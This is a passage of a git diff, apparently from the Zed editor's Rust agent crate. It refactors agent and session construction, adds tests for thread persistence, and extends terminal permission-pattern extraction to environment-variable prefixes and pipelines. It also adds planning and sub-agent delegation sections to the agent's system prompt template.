Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2095,22 +2292,18 @@ mod internal_tests { let thread_store = cx.new(|cx| ThreadStore::new(cx)); // Create the agent and connection - let agent = NativeAgent::new( 
- project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); // Create a thread/session let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2196,21 +2389,17 @@ mod internal_tests { let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2281,6 +2470,61 @@ mod internal_tests { }); } + #[gpui::test] + async fn test_summarization_model_survives_transient_registry_clearing( + cx: &mut TestAppContext, + ) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/", json!({ "a": {} })).await; + let project = Project::test(fs.clone(), [], cx).await; + + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) + }) + .await + 
.unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + thread.read_with(cx, |thread, _| { + assert!( + thread.summarization_model().is_some(), + "session should have a summarization model from the test registry" + ); + }); + + // Simulate what happens during a provider blip: + // update_active_language_model_from_settings calls set_default_model(None) + // when it can't resolve the model, clearing all fallbacks. + cx.update(|cx| { + LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry.set_default_model(None, cx); + }); + }); + cx.run_until_parked(); + + thread.read_with(cx, |thread, _| { + assert!( + thread.summarization_model().is_some(), + "summarization model should survive a transient default model clearing" + ); + }); + } + #[gpui::test] async fn test_loaded_thread_preserves_thinking_enabled(cx: &mut TestAppContext) { init_test(cx); @@ -2288,16 +2532,9 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); // Register a thinking model. @@ -2324,9 +2561,11 @@ mod internal_tests { // Create a thread and select the thinking model. 
let acp_thread = cx .update(|cx| { - connection - .clone() - .new_session(project.clone(), Path::new("/a"), cx) + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2371,7 +2610,9 @@ mod internal_tests { // Reload the thread and verify thinking_enabled is still true. let reloaded_acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); let reloaded_thread = agent.read_with(cx, |agent, _| { @@ -2394,16 +2635,9 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); // Register a model where id() != name(), like real Anthropic models @@ -2431,9 +2665,11 @@ mod internal_tests { // Create a thread and select the model. let acp_thread = cx .update(|cx| { - connection - .clone() - .new_session(project.clone(), Path::new("/a"), cx) + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2478,7 +2714,9 @@ mod internal_tests { // Reload the thread and verify the model was preserved. 
let reloaded_acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); let reloaded_thread = agent.read_with(cx, |agent, _| { @@ -2513,23 +2751,16 @@ mod internal_tests { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -2605,7 +2836,9 @@ mod internal_tests { cx.run_until_parked(); - // Set a draft prompt with rich content blocks before saving. + // Set a draft prompt with rich content blocks and scroll position + // AFTER run_until_parked, so the only save that captures these + // changes is the one performed by close_session itself. let draft_blocks = vec![ acp::ContentBlock::Text(acp::TextContent::new("Check out ")), acp::ContentBlock::ResourceLink(acp::ResourceLink::new("b.md", uri.to_string())), @@ -2620,8 +2853,6 @@ mod internal_tests { offset_in_item: gpui::px(12.5), })); }); - thread.update(cx, |_thread, cx| cx.notify()); - cx.run_until_parked(); // Close the session so it can be reloaded from disk. 
cx.update(|cx| connection.clone().close_session(&session_id, cx)) @@ -2642,7 +2873,9 @@ mod internal_tests { )] ); let acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); acp_thread.read_with(cx, |thread, cx| { @@ -2685,6 +2918,87 @@ mod internal_tests { }); } + #[gpui::test] + async fn test_close_session_saves_thread(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/", + json!({ + "a": { + "file.txt": "hello" + } + }), + ) + .await; + let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection + .clone() + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) + }) + .await + .unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + let model = Arc::new(FakeLanguageModel::default()); + thread.update(cx, |thread, cx| { + thread.set_model(model.clone(), cx); + }); + + // Send a message so the thread is non-empty (empty threads aren't saved). + let send = acp_thread.update(cx, |thread, cx| thread.send(vec!["hello".into()], cx)); + let send = cx.foreground_executor().spawn(send); + cx.run_until_parked(); + + model.send_last_completion_stream_text_chunk("world"); + model.end_last_completion_stream(); + send.await.unwrap(); + cx.run_until_parked(); + + // Set a draft prompt WITHOUT calling run_until_parked afterwards. + // This means no observe-triggered save has run for this change. 
+ // The only way this data gets persisted is if close_session + // itself performs the save. + let draft_blocks = vec![acp::ContentBlock::Text(acp::TextContent::new( + "unsaved draft", + ))]; + acp_thread.update(cx, |thread, _cx| { + thread.set_draft_prompt(Some(draft_blocks.clone())); + }); + + // Close the session immediately — no run_until_parked in between. + cx.update(|cx| connection.clone().close_session(&session_id, cx)) + .await + .unwrap(); + cx.run_until_parked(); + + // Reopen and verify the draft prompt was saved. + let reloaded = agent + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) + .await + .unwrap(); + reloaded.read_with(cx, |thread, _| { + assert_eq!( + thread.draft_prompt(), + Some(draft_blocks.as_slice()), + "close_session must save the thread; draft prompt was lost" + ); + }); + } + fn thread_entries( thread_store: &Entity, cx: &mut TestAppContext, diff --git a/crates/agent/src/db.rs b/crates/agent/src/db.rs index 2c9b33e4efc4f22059e2914589ca6c635b51c0e5..bde07a040869bf11a1b95bf433bf6af1e2d0a932 100644 --- a/crates/agent/src/db.rs +++ b/crates/agent/src/db.rs @@ -25,11 +25,10 @@ pub type DbMessage = crate::Message; pub type DbSummary = crate::legacy_thread::DetailedSummaryState; pub type DbLanguageModel = crate::legacy_thread::SerializedLanguageModel; -#[derive(Debug, Clone, Serialize, Deserialize)] +#[derive(Debug, Clone)] pub struct DbThreadMetadata { pub id: acp::SessionId, pub parent_session_id: Option, - #[serde(alias = "summary")] pub title: SharedString, pub updated_at: DateTime, pub created_at: Option>, @@ -42,9 +41,10 @@ impl From<&DbThreadMetadata> for acp_thread::AgentSessionInfo { fn from(meta: &DbThreadMetadata) -> Self { Self { session_id: meta.id.clone(), - cwd: None, + work_dirs: Some(meta.folder_paths.clone()), title: Some(meta.title.clone()), updated_at: Some(meta.updated_at), + created_at: meta.created_at, meta: None, } } @@ -482,7 +482,10 @@ impl ThreadsDatabase { let data_type 
= DataType::Zstd; let data = compressed; - let created_at = Utc::now().to_rfc3339(); + // Use the thread's updated_at as created_at for new threads. + // This ensures the creation time reflects when the thread was conceptually + // created, not when it was saved to the database. + let created_at = updated_at.clone(); let mut insert = connection.exec_bound::<(Arc, Option>, Option, Option, String, String, DataType, Vec, String)>(indoc! {" INSERT INTO threads (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, data_type, data, created_at) @@ -877,7 +880,6 @@ mod tests { let threads = database.list_threads().await.unwrap(); assert_eq!(threads.len(), 1); - assert_eq!(threads[0].folder_paths, folder_paths); } #[gpui::test] @@ -897,7 +899,6 @@ mod tests { let threads = database.list_threads().await.unwrap(); assert_eq!(threads.len(), 1); - assert!(threads[0].folder_paths.is_empty()); } #[test] diff --git a/crates/agent/src/native_agent_server.rs b/crates/agent/src/native_agent_server.rs index 18c41670ac4b4ba3146fb207992a7020a44fbd5f..7f19f9005e3ff54e361f57075b7af06508476564 100644 --- a/crates/agent/src/native_agent_server.rs +++ b/crates/agent/src/native_agent_server.rs @@ -6,7 +6,8 @@ use agent_settings::AgentSettings; use anyhow::Result; use collections::HashSet; use fs::Fs; -use gpui::{App, Entity, SharedString, Task}; +use gpui::{App, Entity, Task}; +use project::{AgentId, Project}; use prompt_store::PromptStore; use settings::{LanguageModelSelection, Settings as _, update_settings_file}; @@ -25,8 +26,8 @@ impl NativeAgentServer { } impl AgentServer for NativeAgentServer { - fn name(&self) -> SharedString { - "Zed Agent".into() + fn agent_id(&self) -> AgentId { + crate::ZED_AGENT_ID.clone() } fn logo(&self) -> ui::IconName { @@ -35,11 +36,11 @@ impl AgentServer for NativeAgentServer { fn connect( &self, - delegate: AgentServerDelegate, + _delegate: AgentServerDelegate, + _project: Entity, cx: &mut App, ) -> Task>> { 
log::debug!("NativeAgentServer::connect"); - let project = delegate.project().clone(); let fs = self.fs.clone(); let thread_store = self.thread_store.clone(); let prompt_store = PromptStore::global(cx); @@ -49,9 +50,8 @@ impl AgentServer for NativeAgentServer { let prompt_store = prompt_store.await?; log::debug!("Creating native agent entity"); - let agent = - NativeAgent::new(project, thread_store, templates, Some(prompt_store), fs, cx) - .await?; + let agent = cx + .update(|cx| NativeAgent::new(thread_store, templates, Some(prompt_store), fs, cx)); // Create the connection wrapper let connection = NativeAgentConnection(agent); diff --git a/crates/agent/src/pattern_extraction.rs b/crates/agent/src/pattern_extraction.rs index 69a7abae32d6df9c2755e53292ab1c1a1b5341de..7015d69827d7286a1564ce0528ce4627059c49fb 100644 --- a/crates/agent/src/pattern_extraction.rs +++ b/crates/agent/src/pattern_extraction.rs @@ -1,4 +1,5 @@ -use shell_command_parser::extract_commands; +use acp_thread::PermissionPattern; +use shell_command_parser::{extract_commands, extract_terminal_command_prefix}; use std::path::{Path, PathBuf}; use url::Url; @@ -18,8 +19,8 @@ fn is_plain_command_token(token: &str) -> bool { } struct CommandPrefix { - command: String, - subcommand: Option, + normalized_tokens: Vec, + display: String, } /// Extracts the command name and optional subcommand from a shell command using @@ -30,59 +31,83 @@ struct CommandPrefix { /// syntax correctly. Returns `None` if parsing fails or if the command name /// contains path separators (for security reasons). fn extract_command_prefix(command: &str) -> Option { - let commands = extract_commands(command)?; - let first_command = commands.first()?; + let prefix = extract_terminal_command_prefix(command)?; - let mut tokens = first_command.split_whitespace(); - let first_token = tokens.next()?; - - // Only allow alphanumeric commands with hyphens/underscores. 
- // Reject paths like "./script.sh" or "/usr/bin/python" to prevent - // users from accidentally allowing arbitrary script execution. - if !is_plain_command_token(first_token) { + if !is_plain_command_token(&prefix.command) { return None; } - // Include the subcommand (second non-flag token) when present, to produce - // more specific patterns like "cargo test" instead of just "cargo". - let subcommand = tokens - .next() - .filter(|second_token| is_plain_command_token(second_token)) - .map(|second_token| second_token.to_string()); - Some(CommandPrefix { - command: first_token.to_string(), - subcommand, + normalized_tokens: prefix.tokens, + display: prefix.display, }) } -/// Extracts a regex pattern from a terminal command based on the first token (command name). +/// Extracts a regex pattern and display name from a terminal command. /// /// Returns `None` for commands starting with `./`, `/`, or other path-like prefixes. /// This is a deliberate security decision: we only allow pattern-based "always allow" /// rules for well-known command names (like `cargo`, `npm`, `git`), not for arbitrary /// scripts or absolute paths which could be manipulated by an attacker. 
+pub fn extract_terminal_permission_pattern(command: &str) -> Option { + let pattern = extract_terminal_pattern(command)?; + let display_name = extract_terminal_pattern_display(command)?; + Some(PermissionPattern { + pattern, + display_name, + }) +} + pub fn extract_terminal_pattern(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - let escaped_command = regex::escape(&prefix.command); - Some(match &prefix.subcommand { - Some(subcommand) => { - format!( - "^{}\\s+{}(\\s|$)", - escaped_command, - regex::escape(subcommand) - ) - } - None => format!("^{}\\b", escaped_command), - }) + let tokens = prefix.normalized_tokens; + + match tokens.as_slice() { + [] => None, + [single] => Some(format!("^{}\\b", regex::escape(single))), + [rest @ .., last] => Some(format!( + "^{}\\s+{}(\\s|$)", + rest.iter() + .map(|token| regex::escape(token)) + .collect::>() + .join("\\s+"), + regex::escape(last) + )), + } } pub fn extract_terminal_pattern_display(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - match prefix.subcommand { - Some(subcommand) => Some(format!("{} {}", prefix.command, subcommand)), - None => Some(prefix.command), + Some(prefix.display) +} + +/// Extracts patterns for ALL commands in a pipeline, not just the first one. +/// +/// For a command like `"cargo test 2>&1 | tail"`, this returns patterns for +/// both `cargo` and `tail`. Path-based commands (e.g. `./script.sh`) are +/// filtered out, and duplicate command names are deduplicated while preserving +/// order. 
+pub fn extract_all_terminal_patterns(command: &str) -> Vec { + let commands = match extract_commands(command) { + Some(commands) => commands, + None => return Vec::new(), + }; + + let mut results = Vec::new(); + + for cmd in &commands { + let Some(permission_pattern) = extract_terminal_permission_pattern(cmd) else { + continue; + }; + + if results.contains(&permission_pattern) { + continue; + } + + results.push(permission_pattern); } + + results } pub fn extract_path_pattern(path: &str) -> Option { @@ -208,9 +233,24 @@ mod tests { assert!(!pattern.is_match("cargo build-foo")); assert!(!pattern.is_match("cargo builder")); + // Env-var prefixes are included in generated patterns + assert_eq!( + extract_terminal_pattern("PAGER=blah git log --oneline"), + Some("^PAGER=blah\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("A=1 B=2 git log"), + Some("^A=1\\s+B=2\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("PAGER='less -R' git log"), + Some("^PAGER='less \\-R'\\s+git\\s+log(\\s|$)".to_string()) + ); + // Path-like commands are rejected assert_eq!(extract_terminal_pattern("./script.sh arg"), None); assert_eq!(extract_terminal_pattern("/usr/bin/python arg"), None); + assert_eq!(extract_terminal_pattern("PAGER=blah ./script.sh arg"), None); } #[test] @@ -235,6 +275,74 @@ mod tests { extract_terminal_pattern_display("ls"), Some("ls".to_string()) ); + assert_eq!( + extract_terminal_pattern_display("PAGER=blah git log --oneline"), + Some("PAGER=blah git log".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("PAGER='less -R' git log"), + Some("PAGER='less -R' git log".to_string()) + ); + } + + #[test] + fn test_terminal_pattern_regex_normalizes_whitespace() { + let pattern = extract_terminal_pattern("PAGER=blah git log --oneline") + .expect("expected terminal pattern"); + let regex = regex::Regex::new(&pattern).expect("expected valid regex"); + + assert!(regex.is_match("PAGER=blah git log")); 
+ assert!(regex.is_match("PAGER=blah git log --stat")); + } + + #[test] + fn test_extract_terminal_pattern_skips_redirects_before_subcommand() { + assert_eq!( + extract_terminal_pattern("git 2>/dev/null log --oneline"), + Some("^git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("git 2>/dev/null log --oneline"), + Some("git 2>/dev/null log".to_string()) + ); + + assert_eq!( + extract_terminal_pattern("rm --force foo"), + Some("^rm\\b".to_string()) + ); + } + + #[test] + fn test_extract_all_terminal_patterns_pipeline() { + assert_eq!( + extract_all_terminal_patterns("cargo test 2>&1 | tail"), + vec![ + PermissionPattern { + pattern: "^cargo\\s+test(\\s|$)".to_string(), + display_name: "cargo test".to_string(), + }, + PermissionPattern { + pattern: "^tail\\b".to_string(), + display_name: "tail".to_string(), + }, + ] + ); + } + + #[test] + fn test_extract_all_terminal_patterns_with_path_commands() { + assert_eq!( + extract_all_terminal_patterns("./script.sh | grep foo"), + vec![PermissionPattern { + pattern: "^grep\\s+foo(\\s|$)".to_string(), + display_name: "grep foo".to_string(), + }] + ); + } + + #[test] + fn test_extract_all_terminal_patterns_all_paths() { + assert_eq!(extract_all_terminal_patterns("./a.sh | /usr/bin/b"), vec![]); } #[test] diff --git a/crates/agent/src/templates.rs b/crates/agent/src/templates.rs index db787d834e63746fdbea9e837f4fd0615f85c984..103fde17fd4d865b346a428e1f23e335005afe88 100644 --- a/crates/agent/src/templates.rs +++ b/crates/agent/src/templates.rs @@ -85,6 +85,7 @@ mod tests { let templates = Templates::new(); let rendered = template.render(&templates).unwrap(); assert!(rendered.contains("## Fixing Diagnostics")); + assert!(!rendered.contains("## Planning")); assert!(rendered.contains("test-model")); } } diff --git a/crates/agent/src/templates/system_prompt.hbs b/crates/agent/src/templates/system_prompt.hbs index 48e3e586a84438ca9b97f94a24f3710bfc3360b6..67c920707289173ac4c7c1c9d98a8cd64126eb89 
100644 --- a/crates/agent/src/templates/system_prompt.hbs +++ b/crates/agent/src/templates/system_prompt.hbs @@ -20,6 +20,34 @@ You are a highly skilled software engineer with extensive knowledge in many prog - When running commands that may run indefinitely or for a long time (such as build scripts, tests, servers, or file watchers), specify `timeout_ms` to bound runtime. If the command times out, the user can always ask you to run it again with a longer timeout or no timeout if they're willing to wait or cancel manually. - Avoid HTML entity escaping - use plain characters instead. +{{#if (contains available_tools 'update_plan') }} +## Planning + +- You have access to an `update_plan` tool which tracks steps and progress and renders them to the user. +- Use it to show that you've understood the task and to make complex, ambiguous, or multi-phase work easier for the user to follow. +- A good plan breaks the work into meaningful, logically ordered steps that are easy to verify as you go. +- When writing a plan, prefer a short list of concise, concrete steps. +- Keep each step focused on a real unit of work and use short 1-sentence descriptions. +- Do not use plans for simple or single-step queries that you can just do or answer immediately. +- Do not use plans to pad your response with filler steps or to state the obvious. +- Do not include steps that you are not actually capable of doing. +- After calling `update_plan`, do not repeat the full plan in your response. The UI already displays it. Instead, briefly summarize what changed and note any important context or next step. +- Before moving on to a new phase of work, mark the previous step as completed when appropriate. +- When work is in progress, prefer having exactly one step marked as `in_progress`. +- You can mark multiple completed steps in a single `update_plan` call. +- If the task changes midway through, update the plan so it reflects the new approach. 
+ +Use a plan when: + +- The task is non-trivial and will require multiple actions over a longer horizon. +- There are logical phases or dependencies where sequencing matters. +- The work has ambiguity that benefits from outlining high-level goals. +- You want intermediate checkpoints for feedback and validation. +- The user asked you to do more than one thing in a single prompt. +- The user asked you to use the plan tool or TODOs. +- You discover additional steps while working and intend to complete them before yielding to the user. + +{{/if}} ## Searching and Reading If you are unsure how to fulfill the user's request, gather more information with tool calls and/or clarifying questions. @@ -146,6 +174,22 @@ Otherwise, follow debugging best practices: 2. When selecting which version of an API or package to use, choose one that is compatible with the user's dependency management file(s). If no such file exists or if the package is not present, use the latest version that is in your training data. 3. If an external API requires an API Key, be sure to point this out to the user. Adhere to best security practices (e.g. DO NOT hardcode an API key in a place where it can be exposed) +{{#if (contains available_tools 'spawn_agent') }} +## Multi-agent delegation +Sub-agents can help you move faster on large tasks when you use them thoughtfully. This is most useful for: +* Very large tasks with multiple well-defined scopes +* Plans with multiple independent steps that can be executed in parallel +* Independent information-gathering tasks that can be done in parallel +* Requesting a review from another agent on your work or another agent's work +* Getting a fresh perspective on a difficult design or debugging question +* Running tests or config commands that can output a large amount of logs when you want a concise summary. Because you only receive the subagent's final message, ask it to include the relevant failing lines or diagnostics in its response. 
+ +When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. If multiple agents might edit files, assign them disjoint write scopes. + +This feature must be used wisely. For simple or straightforward tasks, prefer doing the work directly instead of spawning a new agent. + +{{/if}} + ## System Information Operating System: {{os}} diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index d33c80a435e84359976d4d8a9edb2bdebd66e0ff..8a291a89e2f2a18b6180d288179406a8ba527d25 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -48,7 +48,7 @@ use std::{ rc::Rc, sync::{ Arc, - atomic::{AtomicBool, Ordering}, + atomic::{AtomicBool, AtomicUsize, Ordering}, }, time::Duration, }; @@ -58,14 +58,14 @@ mod edit_file_thread_test; mod test_tools; use test_tools::*; -fn init_test(cx: &mut TestAppContext) { +pub(crate) fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); }); } -struct FakeTerminalHandle { +pub(crate) struct FakeTerminalHandle { killed: Arc, stopped_by_user: Arc, exit_sender: std::cell::RefCell>>, @@ -75,7 +75,7 @@ struct FakeTerminalHandle { } impl FakeTerminalHandle { - fn new_never_exits(cx: &mut App) -> Self { + pub(crate) fn new_never_exits(cx: &mut App) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); @@ -99,7 +99,7 @@ impl FakeTerminalHandle { } } - fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { + pub(crate) fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); let (exit_sender, _exit_receiver) = futures::channel::oneshot::channel(); @@ -118,15 +118,15 @@ impl FakeTerminalHandle { } } - fn was_killed(&self) -> bool { + pub(crate) fn was_killed(&self) -> bool { 
self.killed.load(Ordering::SeqCst) } - fn set_stopped_by_user(&self, stopped: bool) { + pub(crate) fn set_stopped_by_user(&self, stopped: bool) { self.stopped_by_user.store(stopped, Ordering::SeqCst); } - fn signal_exit(&self) { + pub(crate) fn signal_exit(&self) { if let Some(sender) = self.exit_sender.borrow_mut().take() { let _ = sender.send(()); } @@ -178,18 +178,23 @@ impl SubagentHandle for FakeSubagentHandle { } #[derive(Default)] -struct FakeThreadEnvironment { +pub(crate) struct FakeThreadEnvironment { terminal_handle: Option>, subagent_handle: Option>, + terminal_creations: Arc, } impl FakeThreadEnvironment { - pub fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { + pub(crate) fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { Self { terminal_handle: Some(terminal_handle.into()), ..self } } + + pub(crate) fn terminal_creation_count(&self) -> usize { + self.terminal_creations.load(Ordering::SeqCst) + } } impl crate::ThreadEnvironment for FakeThreadEnvironment { @@ -200,6 +205,7 @@ impl crate::ThreadEnvironment for FakeThreadEnvironment { _output_byte_limit: Option, _cx: &mut AsyncApp, ) -> Task>> { + self.terminal_creations.fetch_add(1, Ordering::SeqCst); let handle = self .terminal_handle .clone() @@ -835,14 +841,20 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { // Approve the first - send "allow" option_id (UI transforms "once" to "allow") tool_call_auth_1 .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); cx.run_until_parked(); // Reject the second - send "deny" option_id directly since Deny is now a button tool_call_auth_2 .response - .send(acp::PermissionOptionId::new("deny")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("deny"), + acp::PermissionOptionKind::RejectOnce, + )) .unwrap(); cx.run_until_parked(); 
@@ -886,8 +898,9 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { let tool_call_auth_3 = next_tool_call_authorization(&mut events).await; tool_call_auth_3 .response - .send(acp::PermissionOptionId::new( - "always_allow:tool_requiring_permission", + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("always_allow:tool_requiring_permission"), + acp::PermissionOptionKind::AllowAlways, )) .unwrap(); cx.run_until_parked(); @@ -995,6 +1008,20 @@ async fn expect_tool_call_update_fields( } } +async fn expect_plan(events: &mut UnboundedReceiver>) -> acp::Plan { + let event = events + .next() + .await + .expect("no plan event received") + .unwrap(); + match event { + ThreadEvent::Plan(plan) => plan, + event => { + panic!("Unexpected event {event:?}"); + } + } +} + async fn next_tool_call_authorization( events: &mut UnboundedReceiver>, ) -> ToolCallAuthorization { @@ -1177,32 +1204,88 @@ fn test_permission_option_ids_for_terminal() { panic!("Expected dropdown permission options"); }; - let allow_ids: Vec = choices - .iter() - .map(|choice| choice.allow.option_id.0.to_string()) - .collect(); - let deny_ids: Vec = choices - .iter() - .map(|choice| choice.deny.option_id.0.to_string()) - .collect(); + // Expect 3 choices: always-tool, always-pattern, once + assert_eq!(choices.len(), 3); - assert!(allow_ids.contains(&"always_allow:terminal".to_string())); - assert!(allow_ids.contains(&"allow".to_string())); - assert!( - allow_ids - .iter() - .any(|id| id.starts_with("always_allow_pattern:terminal\n")), - "Missing allow pattern option" + // First two choices both use the tool-level option IDs + assert_eq!( + choices[0].allow.option_id.0.as_ref(), + "always_allow:terminal" ); + assert_eq!(choices[0].deny.option_id.0.as_ref(), "always_deny:terminal"); + assert!(choices[0].sub_patterns.is_empty()); - assert!(deny_ids.contains(&"always_deny:terminal".to_string())); - assert!(deny_ids.contains(&"deny".to_string())); - assert!( - deny_ids - 
.iter() - .any(|id| id.starts_with("always_deny_pattern:terminal\n")), - "Missing deny pattern option" + assert_eq!( + choices[1].allow.option_id.0.as_ref(), + "always_allow:terminal" ); + assert_eq!(choices[1].deny.option_id.0.as_ref(), "always_deny:terminal"); + assert_eq!(choices[1].sub_patterns, vec!["^cargo\\s+build(\\s|$)"]); + + // Third choice is the one-time allow/deny + assert_eq!(choices[2].allow.option_id.0.as_ref(), "allow"); + assert_eq!(choices[2].deny.option_id.0.as_ref(), "deny"); + assert!(choices[2].sub_patterns.is_empty()); +} + +#[test] +fn test_permission_options_terminal_pipeline_produces_dropdown_with_patterns() { + let permission_options = ToolPermissionContext::new( + TerminalTool::NAME, + vec!["cargo test 2>&1 | tail".to_string()], + ) + .build_permission_options(); + + let PermissionOptions::DropdownWithPatterns { + choices, + patterns, + tool_name, + } = permission_options + else { + panic!("Expected DropdownWithPatterns permission options for pipeline command"); + }; + + assert_eq!(tool_name, TerminalTool::NAME); + + // Should have "Always for terminal" and "Only this time" choices + assert_eq!(choices.len(), 2); + let labels: Vec<&str> = choices + .iter() + .map(|choice| choice.allow.name.as_ref()) + .collect(); + assert!(labels.contains(&"Always for terminal")); + assert!(labels.contains(&"Only this time")); + + // Should have per-command patterns for "cargo test" and "tail" + assert_eq!(patterns.len(), 2); + let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect(); + assert!(pattern_names.contains(&"cargo test")); + assert!(pattern_names.contains(&"tail")); + + // Verify patterns are valid regex patterns + let regex_patterns: Vec<&str> = patterns.iter().map(|cp| cp.pattern.as_str()).collect(); + assert!(regex_patterns.contains(&"^cargo\\s+test(\\s|$)")); + assert!(regex_patterns.contains(&"^tail\\b")); +} + +#[test] +fn test_permission_options_terminal_pipeline_with_chaining() { + let 
